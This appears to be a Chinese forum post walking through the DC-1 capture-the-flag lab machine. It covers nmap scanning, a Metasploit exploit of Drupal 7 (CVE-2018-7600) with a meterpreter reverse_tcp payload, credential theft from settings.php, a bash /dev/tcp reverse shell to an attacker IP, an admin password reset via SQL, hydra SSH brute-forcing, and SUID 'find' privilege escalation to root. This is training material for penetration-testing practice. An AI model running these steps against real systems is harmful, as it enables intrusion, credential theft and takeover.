渗透测试实战-DC-1

打印 上一主题 下一主题

主题 887|帖子 887|积分 2661

firewall-cmd –reload
   
  DC-1 靶机实战
打开测试靶机DC-1


查看网络配置,及网卡

靶机利用NAT 模式,得到其MAC地点

利用nmap 工具扫描内网网段
nmap -sP 192.168.1.144/24 -oN nmap.Sp

MAC 对照得到其IP地点

对其详细举行扫描
nmap -A 192.168.1.158 -p 1-65535 -oN nmap.A

可以看到其80 22 端口都是开放的
在80端口下,我们可以看到其网站的模板为:Drupal 7
22   爆破
80   drupal    CMS
国外三大PHP CMS 之一
drupal
wordpress
joomla
其80端口开放,我们可以利用浏览器直接访问IP地点


MSF
通过利用MSF 直接搜索该网站模板存在的漏洞
启动
msfconsole
search drupal


利用该攻击模块


通过查看References来查看该漏洞的详细信息;
References:
  https://cvedetails.com/cve/CVE-2018-7600/
  https://www.drupal.org/sa-core-2018-002
  https://greysec.net/showthread.php?tid=2912
  https://research.checkpoint.com/uncovering-drupalgeddon-2/
  https://github.com/a2u/CVE-2018-7600
  https://github.com/nixawk/labs/issues/19
  https://github.com/FireFart/CVE-2018-7600



选择攻击载荷
set payload php/meterpreter/reverse_tcp

缺少目的地点,源地点
添加
set RHOSTS 192.168.1.158
set LHOST 192.168.1.150
攻击

拿到shell

flag1

Every good CMS needs a config file - and so do you.
这句话 指引我们,应该去找的该网站的配置文件
地点目录:
sites/default/

flag2
cat sites/default/settings.php


'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',

shell
进入交互式界面



尝试举行数据库毗连
mysql -udbuser -pR0ck3t
毗连失败
思量反弹shell

反弹shell
本地监听2333端口
nc -lvvp 2333

bash -i >& /dev/tcp/192.168.1.150/2333 0>&1
直接反弹失败
借助python 反弹
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@DC-1:/var/www/sites/default$ bash -i >& /dev/tcp/192.168.1.150/2333 0>&1
反弹成功


登录数据库
尝试在反弹shell 下实行毗连数据库
还是失败了
但是我们发现有意思的事情,我们在kali 本机的python 交互式环境下可以成功毗连到数据库
www-data@DC-1:/var/www/sites/default$ mysql -udbuser -pR0ck3t
登入成功

进入数据库drupladb
查询users数据表
select * from users\G


重置后台管理员密码
重置admin 用户密码
这里我们破解admin 用户密码要泯灭时间,我们可以思量重置admin 用户密码,利用drupal 自带脚本重新天生密码。
php scripts/password-hash.sh admin

password: admin                 hash: $S$D9/EB/sN8TEfNaCZ74SqGVO0xxuOe/8fZI3LCOMVXSOqiqfNDwDt
更新users 表
update users set pass="$S$D9/EB/sN8TEfNaCZ74SqGVO0xxuOe/8fZI3LCOMVXSOqiqfNDwDt" where uid=1;

更新成功

flag3





提示我们 etc/passwd

flag4

可以看到我们的flag4 用户是可以登录的

接下来我们利用hydra 爆破,该用户密码
hydra -l flag4 -P /usr/share/john/password.lst 192.168.1.158 ssh -vV -f -o hydra.ssh



我们进入/root 家目录,发现没有权限

是否有一些下令具有SUID 标志
find / -perm -4000 2>/dev/null


利用操作体系内核提权
mkdir
find GGG -exec "whoami" \;
find GGG -exec "/bin/sh" \;


测试完成

   
  

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复

使用道具 举报

0 个回复

正序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

莱莱

金牌会员
这个人很懒什么都没写!
快速回复 返回顶部 返回列表